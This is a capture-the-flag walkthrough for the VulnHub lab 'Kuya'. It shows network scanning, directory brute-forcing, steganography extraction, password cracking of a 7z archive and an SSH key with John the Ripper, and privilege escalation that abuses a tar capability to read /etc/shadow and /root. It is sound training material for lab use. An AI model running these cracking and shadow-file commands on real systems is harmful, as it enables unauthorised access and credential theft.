Today we are going to solve another CTF challenge “Kuya”. It is another vulnerable lab presented by vulnhub for helping pentester’s to perform penetration testing according to their experience level. This vulnerable lab can be downloaded from here.

Level: Medium

Task: To find three flags hidden in the whole application

Penetrating Methodology

• Machine discovery and scanning(netdiscover, nmap)
• Surfing HTTP service port(80)
• Directory enumeration using dirbuster
• Extract steganographic content using steghide
• Extract file from a pcapng file using Wireshark
• Extract and decrypt hashes using John the Ripper
• Check contents of system-wide configuration files for credentials
• Privilege escalation using tar

Let’s start off with discovering the IP address of our VM

netdiscover

Then we’ll continue with our basic Nmap command to find out the open ports and services. Here we’ll find port 22 and 80 open.

nmap -p- -A 192.168.0.16

Once we get the idea of the existence of a web application, we’ll browse it on a browser

We’ll use dirbuster to brute force the directories of the web application.

We’ll browse the directories one-by-one only to find that “loot” is the only helpful directory

We’ll download all the images and use steghide to discover the hidden content beneath the images.

steghide extract -sf 1.jpg
steghide extract -sf 2.jpg
steghide extract -sf 3.jpg
steghide extract -sf 4.jpg
steghide extract -sf image.jpeg

Now, we’ll try to read the files, “secret.txt” there contained a base64 encoded string. Once decoded, it would give a string, not very useful.

cat secret.txt

We’ll check the emb.txt, we get the brainfuck encrypted text

cat emb.txt

Once decrypted, the brainfuck encryption gave us the result and our first flag

We’ll open the “loot.pcapng” file with Wireshark to check the communication and there we found the record of GET and POST request for downloading a file along with the file byte in the 11^th packet. Once selecting the packet we’ll go to File > Export Objects > HTTP and then save the 7z file.

When we tried to open and extract the file contents, it asked for a password so we’ll use 7z2john.pl to get the hash value from the 7z file and use john the ripper to crack it using the rockyou.txt wordlist. Here, we get the password “manchester” for the 7z file.

./7z2john.pl loot.7z > 7zhash
john 7zhash --wordlist:/usr/share/wordlists/rockyou.txt

We’ll again try to extract the contents of the 7z file, providing the password we found out about the two key files found

 

Again, we move back to john the ripper, this time we’ll use ssh2john.py script to get the hash value from the id_rsa file, then we’ll use john to crack the hash using rockyou.txt as wordlist. The password decrypted as “hello”

python ssh2john.py id_rsa > id_rsa.hash
john id_rsa.hash --wordlist:/usr/share/wordlists/rockyou.txt

 

 

Then we wanted to know the username so we head towards id_rsa.pub to check the contents and discover the username in the end of the file. The username came out as “test”.

cat id_rsa.pub

Now we have the username and the private key along with the password, let’s try to connect to SSH

ssh -i id_rsa test@192.168.0.16

 

After getting a shell, first we’ll check the files, in the .ssh directory, we will find a sshscript.sh file having our second flag.

Then we’ll move to /var/www/html /wordpress directory to look out for configuration files and we found a file wp-config-sample.php

cd .ssh
ls -la
cat sshscript.sh
cd /var/www/html/wordpress
ls –al

Use more command along with the cat command to display the complete contents of the config file.

cat wp-config-sample.php |more

Once we get the credentials, use su to switch to a new user, now we tried to find files with sudo permissions, but no luck so we switch to the home directory of the new user and check the files. Here we have a hidden file with bash history named .bash_history having some useful information. It provides us with details about the use of getcap and setcap commands.

su kuya
find / -perm -4000 2>/dev/null
cd
ls
cat who_dis.txt
cat .bash_history

In Linux, files can be provided with a capability to access specific files majorly critical files with specific permissions only; like a script file can be provided with the capability to read ssh configuration files or /etc/shadow file which can be done using getcap and setcap commands. For more information about this, look here(https://linux.die.net/man/7/capabilities)

In Linux, tar has the specific permission to read all files so here we will create a tar file of /etc/shadow and then extract that tar file to display the contents of the newly extracted copy of the original shadow file.

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
getcap -r / 2>/dev/null
tar -cvf shadow.tar "/etc/shadow"
tar -xvf shadow.tar
cat etc/shadow

As we can open extract and archive files that need root permission. We can use the “tar” command to archive the entire “/root” directory as shadow.tar inside user kuya’s home directory. We then extract “shadow.tar” using tar command and are able to get the root directory. We go to the extracted root directory and find a file called “M3m3L0rd.txt”. We open the file and find the final flag.

tar cvf shadow.tar /root
tar xvf shadow.tar
cd root/
cat M3m3L0rd.txt

Author:  Deepanshu is a Certified Ethical Hacker and a budding Security researcher. Contact here.